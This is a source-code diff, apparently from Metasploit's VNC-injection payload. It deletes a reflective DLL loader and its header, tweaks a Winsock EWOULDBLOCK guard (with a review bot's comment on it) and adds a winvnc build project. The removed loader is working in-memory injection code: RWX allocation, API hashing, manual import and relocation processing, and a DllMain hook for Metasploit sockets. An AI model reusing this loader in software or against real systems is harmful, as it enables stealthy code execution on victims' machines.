|
||||||
// STEP 2: load our image into a new permanent location in memory...
|
|
||||||
|
|
||||||
// get the VA of the NT Header for the PE to be loaded
|
|
||||||
uiHeaderValue = uiLibraryAddress + ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_lfanew;
|
|
||||||
|
|
||||||
// allocate all the memory for the DLL to be loaded into. we can load at any address because we will
|
|
||||||
// relocate the image. Also zeros all memory and marks it as READ, WRITE and EXECUTE to avoid any problems.
|
|
||||||
uiBaseAddress = (UINT_PTR)pVirtualAlloc( NULL, ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.SizeOfImage, MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE );
|
|
||||||
|
|
||||||
// we must now copy over the headers
|
|
||||||
uiValueA = ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.SizeOfHeaders;
|
|
||||||
uiValueB = uiLibraryAddress;
|
|
||||||
uiValueC = uiBaseAddress;
|
|
||||||
__movsb( (PBYTE)uiValueC, (PBYTE)uiValueB, uiValueA );
|
|
||||||
|
|
||||||
// STEP 3: load in all of our sections...
|
|
||||||
|
|
||||||
// uiValueA = the VA of the first section
|
|
||||||
uiValueA = ( (UINT_PTR)&((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader + ((PIMAGE_NT_HEADERS)uiHeaderValue)->FileHeader.SizeOfOptionalHeader );
|
|
||||||
|
|
||||||
// itterate through all sections, loading them into memory.
|
|
||||||
while( ((PIMAGE_NT_HEADERS)uiHeaderValue)->FileHeader.NumberOfSections-- )
|
|
||||||
{
|
|
||||||
// uiValueB is the VA for this section
|
|
||||||
uiValueB = ( uiBaseAddress + ((PIMAGE_SECTION_HEADER)uiValueA)->VirtualAddress );
|
|
||||||
|
|
||||||
// uiValueC if the VA for this sections data
|
|
||||||
uiValueC = ( uiLibraryAddress + ((PIMAGE_SECTION_HEADER)uiValueA)->PointerToRawData );
|
|
||||||
|
|
||||||
// copy the section over
|
|
||||||
uiValueD = ((PIMAGE_SECTION_HEADER)uiValueA)->SizeOfRawData;
|
|
||||||
__movsb( (PBYTE)uiValueB, (PBYTE)uiValueC, uiValueD );
|
|
||||||
|
|
||||||
// get the VA of the next section
|
|
||||||
uiValueA += sizeof( IMAGE_SECTION_HEADER );
|
|
||||||
}
|
|
||||||
|
|
||||||
// STEP 4: process our images import table...
|
|
||||||
|
|
||||||
// uiValueB = the address of the import directory
|
|
||||||
uiValueB = (UINT_PTR)&((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_IMPORT ];
|
|
||||||
|
|
||||||
// we assume their is an import table to process
|
|
||||||
// uiValueC is the first entry in the import table
|
|
||||||
uiValueC = ( uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiValueB)->VirtualAddress );
|
|
||||||
|
|
||||||
// itterate through all imports
|
|
||||||
while( ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->Name )
|
|
||||||
{
|
|
||||||
// use LoadLibraryA to load the imported module into memory
|
|
||||||
uiLibraryAddress = (UINT_PTR)pLoadLibraryA( (LPCSTR)( uiBaseAddress + ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->Name ) );
|
|
||||||
|
|
||||||
// uiValueD = VA of the OriginalFirstThunk
|
|
||||||
uiValueD = ( uiBaseAddress + ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->OriginalFirstThunk );
|
|
||||||
|
|
||||||
// uiValueA = VA of the IAT (via first thunk not origionalfirstthunk)
|
|
||||||
uiValueA = ( uiBaseAddress + ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->FirstThunk );
|
|
||||||
|
|
||||||
// itterate through all imported functions, importing by ordinal if no name present
|
|
||||||
while( DEREF(uiValueA) )
|
|
||||||
{
|
|
||||||
// sanity check uiValueD as some compilers only import by FirstThunk
|
|
||||||
if( uiValueD && ((PIMAGE_THUNK_DATA)uiValueD)->u1.Ordinal & IMAGE_ORDINAL_FLAG )
|
|
||||||
{
|
|
||||||
// get the VA of the modules NT Header
|
|
||||||
uiExportDir = uiLibraryAddress + ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_lfanew;
|
|
||||||
|
|
||||||
// uiNameArray = the address of the modules export directory entry
|
|
||||||
uiNameArray = (UINT_PTR)&((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXPORT ];
|
|
||||||
|
|
||||||
// get the VA of the export directory
|
|
||||||
uiExportDir = ( uiLibraryAddress + ((PIMAGE_DATA_DIRECTORY)uiNameArray)->VirtualAddress );
|
|
||||||
|
|
||||||
// get the VA for the array of addresses
|
|
||||||
uiAddressArray = ( uiLibraryAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfFunctions );
|
|
||||||
|
|
||||||
// use the import ordinal (- export ordinal base) as an index into the array of addresses
|
|
||||||
uiAddressArray += ( ( IMAGE_ORDINAL( ((PIMAGE_THUNK_DATA)uiValueD)->u1.Ordinal ) - ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->Base ) * sizeof(DWORD) );
|
|
||||||
|
|
||||||
// patch in the address for this imported function
|
|
||||||
DEREF(uiValueA) = ( uiLibraryAddress + DEREF_32(uiAddressArray) );
|
|
||||||
}
|
|
||||||
else
|
|
||||||
{
|
|
||||||
// get the VA of this functions import by name struct
|
|
||||||
uiValueB = ( uiBaseAddress + DEREF(uiValueA) );
|
|
||||||
|
|
||||||
// use GetProcAddress and patch in the address for this imported function
|
|
||||||
DEREF(uiValueA) = (UINT_PTR)pGetProcAddress( (HMODULE)uiLibraryAddress, (LPCSTR)((PIMAGE_IMPORT_BY_NAME)uiValueB)->Name );
|
|
||||||
}
|
|
||||||
// get the next imported function
|
|
||||||
uiValueA += sizeof( UINT_PTR );
|
|
||||||
if( uiValueD )
|
|
||||||
uiValueD += sizeof( UINT_PTR );
|
|
||||||
}
|
|
||||||
|
|
||||||
// get the next import
|
|
||||||
uiValueC += sizeof( IMAGE_IMPORT_DESCRIPTOR );
|
|
||||||
}
|
|
||||||
|
|
||||||
// STEP 5: process all of our images relocations...
|
|
||||||
|
|
||||||
// calculate the base address delta and perform relocations (even if we load at desired image base)
|
|
||||||
uiLibraryAddress = uiBaseAddress - ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.ImageBase;
|
|
||||||
|
|
||||||
// uiValueB = the address of the relocation directory
|
|
||||||
uiValueB = (UINT_PTR)&((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_BASERELOC ];
|
|
||||||
|
|
||||||
// check if their are any relocations present
|
|
||||||
if( ((PIMAGE_DATA_DIRECTORY)uiValueB)->Size )
|
|
||||||
{
|
|
||||||
// uiValueC is now the first entry (IMAGE_BASE_RELOCATION)
|
|
||||||
uiValueC = ( uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiValueB)->VirtualAddress );
|
|
||||||
|
|
||||||
// and we itterate through all entries...
|
|
||||||
while( ((PIMAGE_BASE_RELOCATION)uiValueC)->SizeOfBlock )
|
|
||||||
{
|
|
||||||
// uiValueA = the VA for this relocation block
|
|
||||||
uiValueA = ( uiBaseAddress + ((PIMAGE_BASE_RELOCATION)uiValueC)->VirtualAddress );
|
|
||||||
|
|
||||||
// uiValueB = number of entries in this relocation block
|
|
||||||
uiValueB = ( ((PIMAGE_BASE_RELOCATION)uiValueC)->SizeOfBlock - sizeof(IMAGE_BASE_RELOCATION) ) / sizeof( IMAGE_RELOC );
|
|
||||||
|
|
||||||
// uiValueD is now the first entry in the current relocation block
|
|
||||||
uiValueD = uiValueC + sizeof(IMAGE_BASE_RELOCATION);
|
|
||||||
|
|
||||||
// we itterate through all the entries in the current block...
|
|
||||||
while( uiValueB-- )
|
|
||||||
{
|
|
||||||
// perform the relocation, skipping IMAGE_REL_BASED_ABSOLUTE as required.
|
|
||||||
// we dont use a switch statement to avoid the compiler building a jump table
|
|
||||||
// which would not be very position independent!
|
|
||||||
if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_DIR64 )
|
|
||||||
*(UINT_PTR *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += uiLibraryAddress;
|
|
||||||
else if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_HIGHLOW )
|
|
||||||
*(DWORD *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += (DWORD)uiLibraryAddress;
|
|
||||||
else if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_HIGH )
|
|
||||||
*(WORD *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += HIWORD(uiLibraryAddress);
|
|
||||||
else if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_LOW )
|
|
||||||
*(WORD *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += LOWORD(uiLibraryAddress);
|
|
||||||
|
|
||||||
// get the next entry in the current relocation block
|
|
||||||
uiValueD += sizeof( IMAGE_RELOC );
|
|
||||||
}
|
|
||||||
|
|
||||||
// get the next entry in the relocation directory
|
|
||||||
uiValueC = uiValueC + ((PIMAGE_BASE_RELOCATION)uiValueC)->SizeOfBlock;
|
|
||||||
}
|
|
||||||
}
|
|
||||||
|
|
||||||
// STEP 6: process the images exception directory if it has one (PE32+ for x64)
|
|
||||||
/*
|
|
||||||
// uiValueB = the address of the relocation directory
|
|
||||||
uiValueB = (UINT_PTR)&((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXCEPTION ];
|
|
||||||
// check if their are any exception etries present
|
|
||||||
if( ((PIMAGE_DATA_DIRECTORY)uiValueB)->Size )
|
|
||||||
{
|
|
||||||
// get the number of entries
|
|
||||||
uiValueA = ((PIMAGE_DATA_DIRECTORY)uiValueB)->Size / sizeof( IMAGE_RUNTIME_FUNCTION_ENTRY );
|
|
||||||
|
|
||||||
// uiValueC is now the first entry (IMAGE_RUNTIME_FUNCTION_ENTRY)
|
|
||||||
uiValueC = ( uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiValueB)->VirtualAddress );
|
|
||||||
|
|
||||||
// itterate through all entries
|
|
||||||
while( uiValueA-- )
|
|
||||||
{
|
|
||||||
//((IMAGE_RUNTIME_FUNCTION_ENTRY)uiValueC).BeginAddress
|
|
||||||
|
|
||||||
// get the next entry
|
|
||||||
uiValueC += sizeof( IMAGE_RUNTIME_FUNCTION_ENTRY );
|
|
||||||
}
|
|
||||||
}
|
|
||||||
*/
|
|
||||||
// STEP 7: call our images entry point
|
|
||||||
|
|
||||||
// uiValueA = the VA of our newly loaded DLL/EXE's entry point
|
|
||||||
uiValueA = ( uiBaseAddress + ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.AddressOfEntryPoint );
|
|
||||||
|
|
||||||
// call our respective entry point, fudging our hInstance value
|
|
||||||
#ifdef REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR
|
|
||||||
// if we are injecting a DLL via LoadRemoteLibraryR we call DllMain and pass in our parameter (via the DllMain lpReserved parameter)
|
|
||||||
((DLLMAIN)uiValueA)( (HINSTANCE)uiBaseAddress, DLL_PROCESS_ATTACH, lpParameter );
|
|
||||||
#else
|
|
||||||
// if we are injecting an DLL via a stub we call DllMain with no parameter
|
|
||||||
((DLLMAIN)uiValueA)( (HINSTANCE)uiBaseAddress, DLL_PROCESS_ATTACH, NULL );
|
|
||||||
#endif
|
|
||||||
|
|
||||||
// STEP 8: return our new entry point address so whatever called us can call DLL_METASPLOIT_ATTACH/DLL_METASPLOIT_DETACH
|
|
||||||
return uiValueA;
|
|
||||||
}
|
|
||||||
//===============================================================================================//
|
|
||||||
#ifndef REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN
|
|
||||||
|
|
||||||
// you must implement this function...
|
|
||||||
extern DWORD DLLEXPORT Init( SOCKET socket );
|
|
||||||
|
|
||||||
BOOL MetasploitDllAttach( SOCKET socket )
|
|
||||||
{
|
|
||||||
Init( socket );
|
|
||||||
return TRUE;
|
|
||||||
}
|
|
||||||
|
|
||||||
BOOL MetasploitDllDetach( DWORD dwExitFunc )
|
|
||||||
{
|
|
||||||
switch( dwExitFunc )
|
|
||||||
{
|
|
||||||
case EXITFUNC_SEH:
|
|
||||||
SetUnhandledExceptionFilter( NULL );
|
|
||||||
break;
|
|
||||||
case EXITFUNC_THREAD:
|
|
||||||
ExitThread( 0 );
|
|
||||||
break;
|
|
||||||
case EXITFUNC_PROCESS:
|
|
||||||
ExitProcess( 0 );
|
|
||||||
break;
|
|
||||||
default:
|
|
||||||
break;
|
|
||||||
}
|
|
||||||
|
|
||||||
return TRUE;
|
|
||||||
}
|
|
||||||
|
|
||||||
BOOL WINAPI DllMain( HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved )
|
|
||||||
{
|
|
||||||
BOOL bReturnValue = TRUE;
|
|
||||||
switch( dwReason )
|
|
||||||
{
|
|
||||||
case DLL_METASPLOIT_ATTACH:
|
|
||||||
bReturnValue = MetasploitDllAttach( (SOCKET)lpReserved );
|
|
||||||
break;
|
|
||||||
case DLL_METASPLOIT_DETACH:
|
|
||||||
bReturnValue = MetasploitDllDetach( (DWORD)lpReserved );
|
|
||||||
break;
|
|
||||||
case DLL_QUERY_HMODULE:
|
|
||||||
if( lpReserved != NULL )
|
|
||||||
*(HMODULE *)lpReserved = hAppInstance;
|
|
||||||
break;
|
|
||||||
case DLL_PROCESS_ATTACH:
|
|
||||||
hAppInstance = hinstDLL;
|
|
||||||
break;
|
|
||||||
case DLL_PROCESS_DETACH:
|
|
||||||
case DLL_THREAD_ATTACH:
|
|
||||||
case DLL_THREAD_DETACH:
|
|
||||||
break;
|
|
||||||
}
|
|
||||||
return bReturnValue;
|
|
||||||
}
|
|
||||||
|
|
||||||
#endif
|
|
||||||
//===============================================================================================//
@ -1,197 +0,0 @@
|
||||||
//===============================================================================================//
|
|
||||||
// Copyright (c) 2009, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
|
|
||||||
// All rights reserved.
|
|
||||||
//
|
|
||||||
// Redistribution and use in source and binary forms, with or without modification, are permitted
|
|
||||||
// provided that the following conditions are met:
|
|
||||||
//
|
|
||||||
// * Redistributions of source code must retain the above copyright notice, this list of
|
|
||||||
// conditions and the following disclaimer.
|
|
||||||
//
|
|
||||||
// * Redistributions in binary form must reproduce the above copyright notice, this list of
|
|
||||||
// conditions and the following disclaimer in the documentation and/or other materials provided
|
|
||||||
// with the distribution.
|
|
||||||
//
|
|
||||||
// * Neither the name of Harmony Security nor the names of its contributors may be used to
|
|
||||||
// endorse or promote products derived from this software without specific prior written permission.
|
|
||||||
//
|
|
||||||
// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR
|
|
||||||
// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
|
|
||||||
// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
|
|
||||||
// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
|
|
||||||
// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
|
|
||||||
// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
|
|
||||||
// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
|
|
||||||
// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
|
|
||||||
// POSSIBILITY OF SUCH DAMAGE.
|
|
||||||
//===============================================================================================//
|
|
||||||
#ifndef _VNCDLL_LOADER_REFLECTIVELOADER_H
|
|
||||||
#define _VNCDLL_LOADER_REFLECTIVELOADER_H
|
|
||||||
//===============================================================================================//
|
|
||||||
#define WIN32_LEAN_AND_MEAN
|
|
||||||
#include <windows.h>
|
|
||||||
#include <Winsock2.h>
|
|
||||||
#include <intrin.h>
|
|
||||||
|
|
||||||
#include "ReflectiveDLLInjection.h"
|
|
||||||
|
|
||||||
#define EXITFUNC_SEH 0xEA320EFE
|
|
||||||
#define EXITFUNC_THREAD 0x0A2A1DE0
|
|
||||||
#define EXITFUNC_PROCESS 0x56A2B5F0
|
|
||||||
|
|
||||||
typedef HMODULE (WINAPI * LOADLIBRARYA)( LPCSTR );
|
|
||||||
typedef FARPROC (WINAPI * GETPROCADDRESS)( HMODULE, LPCSTR );
|
|
||||||
typedef LPVOID (WINAPI * VIRTUALALLOC)( LPVOID, SIZE_T, DWORD, DWORD );
|
|
||||||
|
|
||||||
#define KERNEL32DLL_HASH 0x6A4ABC5B
|
|
||||||
#define LOADLIBRARYA_HASH 0xEC0E4E8E
|
|
||||||
#define GETPROCADDRESS_HASH 0x7C0DFCAA
|
|
||||||
#define VIRTUALALLOC_HASH 0x91AFCA54
|
|
||||||
|
|
||||||
#define HASH_KEY 13
|
|
||||||
//===============================================================================================//
|
|
||||||
#pragma intrinsic( _rotr )
|
|
||||||
|
|
||||||
__forceinline DWORD ror( DWORD d )
|
|
||||||
{
|
|
||||||
return _rotr( d, HASH_KEY );
|
|
||||||
}
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
__forceinline DWORD hash( char * c )
|
|
||||||
{
|
|
||||||
register DWORD h = 0;
|
|
||||||
do
|
|
||||||
{
|
|
||||||
h = ror( h );
|
|
||||||
h += *c;
|
|
||||||
} while( *++c );
|
|
||||||
|
|
||||||
return h;
|
|
||||||
}
|
|
||||||
//===============================================================================================//
|
|
||||||
typedef struct _UNICODE_STR
|
|
||||||
{
|
|
||||||
USHORT Length;
|
|
||||||
USHORT MaximumLength;
|
|
||||||
PWSTR pBuffer;
|
|
||||||
} UNICODE_STR, *PUNICODE_STR;
|
|
||||||
|
|
||||||
// WinDbg> dt -v ntdll!_LDR_DATA_TABLE_ENTRY
|
|
||||||
//__declspec( align(8) )
|
|
||||||
typedef struct _LDR_DATA_TABLE_ENTRY
|
|
||||||
{
|
|
||||||
//LIST_ENTRY InLoadOrderLinks; // As we search from PPEB_LDR_DATA->InMemoryOrderModuleList we dont use the first entry.
|
|
||||||
LIST_ENTRY InMemoryOrderModuleList;
|
|
||||||
LIST_ENTRY InInitializationOrderModuleList;
|
|
||||||
PVOID DllBase;
|
|
||||||
PVOID EntryPoint;
|
|
||||||
ULONG SizeOfImage;
|
|
||||||
UNICODE_STR FullDllName;
|
|
||||||
UNICODE_STR BaseDllName;
|
|
||||||
ULONG Flags;
|
|
||||||
SHORT LoadCount;
|
|
||||||
SHORT TlsIndex;
|
|
||||||
LIST_ENTRY HashTableEntry;
|
|
||||||
ULONG TimeDateStamp;
|
|
||||||
} LDR_DATA_TABLE_ENTRY, *PLDR_DATA_TABLE_ENTRY;
|
|
||||||
|
|
||||||
// WinDbg> dt -v ntdll!_PEB_LDR_DATA
|
|
||||||
typedef struct _PEB_LDR_DATA //, 7 elements, 0x28 bytes
|
|
||||||
{
|
|
||||||
DWORD dwLength;
|
|
||||||
DWORD dwInitialized;
|
|
||||||
LPVOID lpSsHandle;
|
|
||||||
LIST_ENTRY InLoadOrderModuleList;
|
|
||||||
LIST_ENTRY InMemoryOrderModuleList;
|
|
||||||
LIST_ENTRY InInitializationOrderModuleList;
|
|
||||||
LPVOID lpEntryInProgress;
|
|
||||||
} PEB_LDR_DATA, * PPEB_LDR_DATA;
|
|
||||||
|
|
||||||
// WinDbg> dt -v ntdll!_PEB_FREE_BLOCK
|
|
||||||
typedef struct _PEB_FREE_BLOCK // 2 elements, 0x8 bytes
|
|
||||||
{
|
|
||||||
struct _PEB_FREE_BLOCK * pNext;
|
|
||||||
DWORD dwSize;
|
|
||||||
} PEB_FREE_BLOCK, * PPEB_FREE_BLOCK;
|
|
||||||
|
|
||||||
// struct _PEB is defined in Winternl.h but it is incomplete
|
|
||||||
// WinDbg> dt -v ntdll!_PEB
|
|
||||||
typedef struct __PEB // 65 elements, 0x210 bytes
|
|
||||||
{
|
|
||||||
BYTE bInheritedAddressSpace;
|
|
||||||
BYTE bReadImageFileExecOptions;
|
|
||||||
BYTE bBeingDebugged;
|
|
||||||
BYTE bSpareBool;
|
|
||||||
LPVOID lpMutant;
|
|
||||||
LPVOID lpImageBaseAddress;
|
|
||||||
PPEB_LDR_DATA pLdr;
|
|
||||||
LPVOID lpProcessParameters;
|
|
||||||
LPVOID lpSubSystemData;
|
|
||||||
LPVOID lpProcessHeap;
|
|
||||||
PRTL_CRITICAL_SECTION pFastPebLock;
|
|
||||||
LPVOID lpFastPebLockRoutine;
|
|
||||||
LPVOID lpFastPebUnlockRoutine;
|
|
||||||
DWORD dwEnvironmentUpdateCount;
|
|
||||||
LPVOID lpKernelCallbackTable;
|
|
||||||
DWORD dwSystemReserved;
|
|
||||||
DWORD dwAtlThunkSListPtr32;
|
|
||||||
PPEB_FREE_BLOCK pFreeList;
|
|
||||||
DWORD dwTlsExpansionCounter;
|
|
||||||
LPVOID lpTlsBitmap;
|
|
||||||
DWORD dwTlsBitmapBits[2];
|
|
||||||
LPVOID lpReadOnlySharedMemoryBase;
|
|
||||||
LPVOID lpReadOnlySharedMemoryHeap;
|
|
||||||
LPVOID lpReadOnlyStaticServerData;
|
|
||||||
LPVOID lpAnsiCodePageData;
|
|
||||||
LPVOID lpOemCodePageData;
|
|
||||||
LPVOID lpUnicodeCaseTableData;
|
|
||||||
DWORD dwNumberOfProcessors;
|
|
||||||
DWORD dwNtGlobalFlag;
|
|
||||||
LARGE_INTEGER liCriticalSectionTimeout;
|
|
||||||
DWORD dwHeapSegmentReserve;
|
|
||||||
DWORD dwHeapSegmentCommit;
|
|
||||||
DWORD dwHeapDeCommitTotalFreeThreshold;
|
|
||||||
DWORD dwHeapDeCommitFreeBlockThreshold;
|
|
||||||
DWORD dwNumberOfHeaps;
|
|
||||||
DWORD dwMaximumNumberOfHeaps;
|
|
||||||
LPVOID lpProcessHeaps;
|
|
||||||
LPVOID lpGdiSharedHandleTable;
|
|
||||||
LPVOID lpProcessStarterHelper;
|
|
||||||
DWORD dwGdiDCAttributeList;
|
|
||||||
LPVOID lpLoaderLock;
|
|
||||||
DWORD dwOSMajorVersion;
|
|
||||||
DWORD dwOSMinorVersion;
|
|
||||||
WORD wOSBuildNumber;
|
|
||||||
WORD wOSCSDVersion;
|
|
||||||
DWORD dwOSPlatformId;
|
|
||||||
DWORD dwImageSubsystem;
|
|
||||||
DWORD dwImageSubsystemMajorVersion;
|
|
||||||
DWORD dwImageSubsystemMinorVersion;
|
|
||||||
DWORD dwImageProcessAffinityMask;
|
|
||||||
DWORD dwGdiHandleBuffer[34];
|
|
||||||
LPVOID lpPostProcessInitRoutine;
|
|
||||||
LPVOID lpTlsExpansionBitmap;
|
|
||||||
DWORD dwTlsExpansionBitmapBits[32];
|
|
||||||
DWORD dwSessionId;
|
|
||||||
ULARGE_INTEGER liAppCompatFlags;
|
|
||||||
ULARGE_INTEGER liAppCompatFlagsUser;
|
|
||||||
LPVOID lppShimData;
|
|
||||||
LPVOID lpAppCompatInfo;
|
|
||||||
UNICODE_STR usCSDVersion;
|
|
||||||
LPVOID lpActivationContextData;
|
|
||||||
LPVOID lpProcessAssemblyStorageMap;
|
|
||||||
LPVOID lpSystemDefaultActivationContextData;
|
|
||||||
LPVOID lpSystemAssemblyStorageMap;
|
|
||||||
DWORD dwMinimumStackCommit;
|
|
||||||
} _PEB, * _PPEB;
|
|
||||||
|
|
||||||
typedef struct
|
|
||||||
{
|
|
||||||
WORD offset:12;
|
|
||||||
WORD type:4;
|
|
||||||
} IMAGE_RELOC, *PIMAGE_RELOC;
|
|
||||||
//===============================================================================================//
|
|
||||||
#endif
|
|
||||||
//===============================================================================================//
@ -70,7 +70,7 @@ class VSocket;
|
||||||
////////////////////////////////////////////////////////
|
////////////////////////////////////////////////////////
|
||||||
// *** Lovely hacks to make Win32 work. Hurrah!
|
// *** Lovely hacks to make Win32 work. Hurrah!
|
||||||
|
|
||||||
#ifdef __WIN32__
|
#if defined(__WIN32__) && !defined(EWOULDBLOCK)
|
||||||
#define EWOULDBLOCK WSAEWOULDBLOCK
|
#define EWOULDBLOCK WSAEWOULDBLOCK
|
||||||
#endif
|
#endif
|
||||||
|
|
||||||
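Review bot: The new `!defined(EWOULDBLOCK)` guard keeps a CRT-provided EWOULDBLOCK in place of WSAEWOULDBLOCK, and on recent MSVC CRTs errno.h defines EWOULDBLOCK with a value that differs from WSAEWOULDBLOCK, so any comparison of a WSAGetLastError() result against EWOULDBLOCK in the code that consumes this header would silently never match on those toolchains. I cannot see such comparisons in the hunk, so this is something to confirm in the users of this header rather than a defect I can point to here. If Winsock error codes are compared this way, compare against WSAEWOULDBLOCK directly or give the mapping its own name, e.g. `#define VSOCKET_EWOULDBLOCK WSAEWOULDBLOCK`, instead of relying on whatever value EWOULDBLOCK already has. A short comment above the guard stating why it exists, `// newer CRTs define EWOULDBLOCK in errno.h; do not redefine it there`, would spare the next reader the same investigation.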
|
@ -0,0 +1,473 @@
|
||||||
|
<?xml version="1.0" encoding="utf-8"?>
|
||||||
|
<Project DefaultTargets="Build" ToolsVersion="12.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
|
||||||
|
<ItemGroup Label="ProjectConfigurations">
|
||||||
|
<ProjectConfiguration Include="Debug|Win32">
|
||||||
|
<Configuration>Debug</Configuration>
|
||||||
|
<Platform>Win32</Platform>
|
||||||
|
</ProjectConfiguration>
|
||||||
|
<ProjectConfiguration Include="Debug|x64">
|
||||||
|
<Configuration>Debug</Configuration>
|
||||||
|
<Platform>x64</Platform>
|
||||||
|
</ProjectConfiguration>
|
||||||
|
<ProjectConfiguration Include="Release|Win32">
|
||||||
|
<Configuration>Release</Configuration>
|
||||||
|
<Platform>Win32</Platform>
|
||||||
|
</ProjectConfiguration>
|
||||||
|
<ProjectConfiguration Include="Release|x64">
|
||||||
|
<Configuration>Release</Configuration>
|
||||||
|
<Platform>x64</Platform>
|
||||||
|
</ProjectConfiguration>
|
||||||
|
</ItemGroup>
|
||||||
|
<PropertyGroup Label="Globals">
|
||||||
|
<ProjectName>winvnc</ProjectName>
|
||||||
|
<ProjectGuid>{EA6A09AC-04BB-423D-8842-CA48DF901058}</ProjectGuid>
|
||||||
|
<RootNamespace>WinVNC</RootNamespace>
|
||||||
|
<SccLocalPath>.</SccLocalPath>
|
||||||
|
</PropertyGroup>
|
||||||
|
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
|
||||||
|
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
|
||||||
|
<ConfigurationType>DynamicLibrary</ConfigurationType>
|
||||||
|
<PlatformToolset>v120_xp</PlatformToolset>
|
||||||
|
<UseOfMfc>false</UseOfMfc>
|
||||||
|
<CharacterSet>MultiByte</CharacterSet>
|
||||||
|
</PropertyGroup>
|
||||||
|
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
|
||||||
|
<ConfigurationType>DynamicLibrary</ConfigurationType>
|
||||||
|
<PlatformToolset>v120_xp</PlatformToolset>
|
||||||
|
<UseOfMfc>false</UseOfMfc>
|
||||||
|
<CharacterSet>MultiByte</CharacterSet>
|
||||||
|
</PropertyGroup>
|
||||||
|
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
|
||||||
|
<ConfigurationType>DynamicLibrary</ConfigurationType>
|
||||||
|
<PlatformToolset>v120_xp</PlatformToolset>
|
||||||
|
<UseOfMfc>false</UseOfMfc>
|
||||||
|
<CharacterSet>MultiByte</CharacterSet>
|
||||||
|
</PropertyGroup>
|
||||||
|
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
|
||||||
|
<ConfigurationType>DynamicLibrary</ConfigurationType>
|
||||||
|
<PlatformToolset>v120_xp</PlatformToolset>
|
||||||
|
<UseOfMfc>false</UseOfMfc>
|
||||||
|
<CharacterSet>MultiByte</CharacterSet>
|
||||||
|
</PropertyGroup>
|
||||||
|
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
|
||||||
|
<ImportGroup Label="ExtensionSettings">
|
||||||
|
</ImportGroup>
|
||||||
|
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="PropertySheets">
|
||||||
|
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||||
|
<Import Project="$(VCTargetsPath)Microsoft.CPP.UpgradeFromVC71.props" />
|
||||||
|
</ImportGroup>
|
||||||
|
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="PropertySheets">
|
||||||
|
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
|
||||||
|
<Import Project="$(VCTargetsPath)Microsoft.CPP.UpgradeFromVC71.props" />
|
||||||
|
</ImportGroup>
|
||||||
|
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets">
|
||||||
|
